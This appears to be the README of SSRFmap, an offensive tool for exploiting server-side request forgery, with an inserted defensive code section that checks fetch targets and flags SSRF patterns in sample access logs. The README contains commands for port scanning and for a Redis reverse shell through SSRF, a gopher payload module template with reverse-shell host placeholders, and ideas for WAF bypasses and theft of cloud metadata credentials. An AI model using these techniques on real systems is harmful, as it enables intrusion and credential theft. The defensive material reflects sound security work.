# SSRFmap

> Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf. It is often used to leverage actions on other services; this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

## Guide / RTFM

```powershell
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST]
                  [--lport LPORT]

optional arguments:
  -h, --help     show this help message and exit
  -r REQFILE     SSRF Request file
  -p PARAM       SSRF Parameter to target
  -m MODULES     SSRF Modules to enable
  -l HANDLER     Start an handler for a reverse shell
  --lhost LHOST  LHOST reverse shell
  --lport LPORT  LPORT reverse shell
```

The default way to use this script is the following.

```powershell
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l creates a listener for the reverse shell on the specified port
# --lhost and --lport work like in Metasploit: these values are used to create the reverse shell payload
```

## Contribute

I <3 pull requests :)
Feel free to add any feature listed below or a new service.

- --level arg - ability to tweak payloads in order to bypass some IDS/WAF. E.g: `127.0.0.1 -> [::] -> 0000: -> ...`
- networkscan - same as portscan, but the goal is to discover machines on the same network
- aws and other cloud providers - extract sensitive data from http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy and more

The following code is a template if you wish to add a module interacting with a service.

```python
from core.utils import *
import logging

# Module metadata, listed by the framework when the module is loaded
name = "servicename in lowercase"
description = "ServiceName RCE - What does it d"
author = "Name or pseudo of the author"


class exploit():

    def __init__(self, requester, args):
        logging.info("Module '{}' launched !".format(name))

        # Data for the service: raw protocol commands, CRLF-encoded, that
        # wrapper_gopher (from core.utils) packs into a gopher:// URL
        # pointing at ip:port
        ip = "127.0.0.1"
        port = "6379"
        data = "*1%0d%0a$8%0d%0af[...]save%0d%0aquit%0d%0a"
        payload = wrapper_gopher(data, ip, port)

        # Handle args for reverse shell: fill the SERVER_HOST / SERVER_PORT
        # placeholders from --lhost / --lport, or prompt if they were not given
        if args.lhost is None:
            payload = payload.replace("SERVER_HOST", input("Server Host:"))
        else:
            payload = payload.replace("SERVER_HOST", args.lhost)

        if args.lport is None:
            payload = payload.replace("SERVER_PORT", input("Server Port:"))
        else:
            payload = payload.replace("SERVER_PORT", args.lport)

        # Send the payload through the SSRF parameter selected with -p
        r = requester.do_request(args.param, payload)
```
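
The flip side of the module template above and of the `--level` bypass idea in the wish list is how a defender recognises this traffic. The following is an added example, not SSRFmap's own code: it canonicalises the target of a server-side fetch instead of string-matching it, so the localhost spellings the `--level` bullet lists (`127.0.0.1`, `[::]`), the `169.254.169.254` metadata address and the `gopher://` scheme the template relies on all fall to the same check, and it then runs that check over constructed access-log lines. The function names (`reject_reason`, `flag_log_lines`, `static_resolver`), the log format and the resolver stub address are assumptions of this example; the `url` parameter name follows the README's `-p url` usage.

```python
"""Defender-side target checks for SSRF fetches (added example, not SSRFmap code)."""
import ipaddress
import socket
from urllib.parse import parse_qs, urlsplit

# Only plain web fetches are allowed; gopher://, dict://, file:// etc. are
# exactly what lets an SSRF speak raw protocol to Redis and friends.
ALLOWED_SCHEMES = {"http", "https"}
# Cloud instance-metadata address quoted in the README's cloud bullet.
METADATA_ADDRS = {ipaddress.ip_address("169.254.169.254")}


def default_resolver(host):
    """Resolve a hostname to the set of addresses it maps to (real DNS)."""
    return {ipaddress.ip_address(info[4][0]) for info in socket.getaddrinfo(host, None)}


def static_resolver(*ips):
    """Resolver stub for offline runs/tests: every name maps to the given IPs (constructed)."""
    fixed = {ipaddress.ip_address(ip) for ip in ips}
    return lambda host: fixed


def reject_reason(url, resolver=default_resolver):
    """Return why ``url`` must not be fetched server-side, or None if it may.

    Literal hosts are parsed with ``ipaddress`` so 127.0.0.1, ::1 and [::]
    all land on the same loopback/unspecified test; names are resolved so a
    private address cannot hide behind DNS.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return "no host in URL"
    try:
        addrs = {ipaddress.ip_address(host)}
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:  # socket.gaierror is a subclass
            return "unresolvable host %r" % host
    for addr in addrs:
        if addr.is_loopback or addr.is_unspecified:
            return "%s targets the local machine" % addr
        if addr in METADATA_ADDRS or addr.is_link_local:
            return "%s is a link-local/metadata address" % addr
        if addr.is_private:
            return "%s is an internal network address" % addr
    return None


# Constructed combined-format log lines (not real traffic). Line 1 is a
# benign fetch; lines 2-5 are the shapes the portscan, redis and cloud
# modules would leave behind when aimed at a "url" parameter.
SAMPLE_LOG = [
    '203.0.113.9 - - [01/Jan/2024:10:00:00 +0000] "GET /fetch?url=https%3A%2F%2Fexample.com%2Ffeed HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /fetch?url=http%3A%2F%2F127.0.0.1%3A6379%2F HTTP/1.1" 200 12',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /fetch?url=http%3A%2F%2F%5B%3A%3A%5D%3A6379%2F HTTP/1.1" 200 12',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /fetch?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A1%250d%250a HTTP/1.1" 500 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /fetch?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 90',
]


def flag_log_lines(lines, param="url", resolver=default_resolver):
    """Return (line_number, reason) for every request whose fetch parameter is unsafe."""
    hits = []
    for number, line in enumerate(lines, 1):
        try:
            target = line.split('"')[1].split(" ")[1]  # request-target from "GET /path HTTP/1.1"
        except IndexError:
            continue  # not a well-formed request line, skip it
        for fetched in parse_qs(urlsplit(target).query).get(param, []):
            reason = reject_reason(fetched, resolver)
            if reason:
                hits.append((number, reason))
    return hits


if __name__ == "__main__":
    # The stub resolver keeps the demo offline; drop it to use real DNS.
    for number, reason in flag_log_lines(SAMPLE_LOG, resolver=static_resolver("93.184.216.34")):
        print("line %d: %s" % (number, reason))
```

The same `reject_reason` check is what an application should run before performing a fetch on a user-supplied URL; resolving the name first and testing the resulting addresses is what makes the `127.0.0.1 -> [::]` style rewrites from the wish list ineffective, since every spelling collapses to the same address object.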

You can also contribute with a beer IRL or with `buymeacoffee.com`

[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)

## Thanks to the contributors

- ???

## Inspired by

- [All you need to know about SSRF and how may we write tools to do auto-detect - Auxy](https://medium.com/bugbountywriteup/the-design-and-implementation-of-ssrf-attack-framework-550e9fda16ea)
- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
- [Blog on Gopherus Tool - SpyD3r](https://spyclub.tech/2018/blog-on-gopherus/)
- [Gopherus - Github](https://github.com/tarunkant/Gopherus)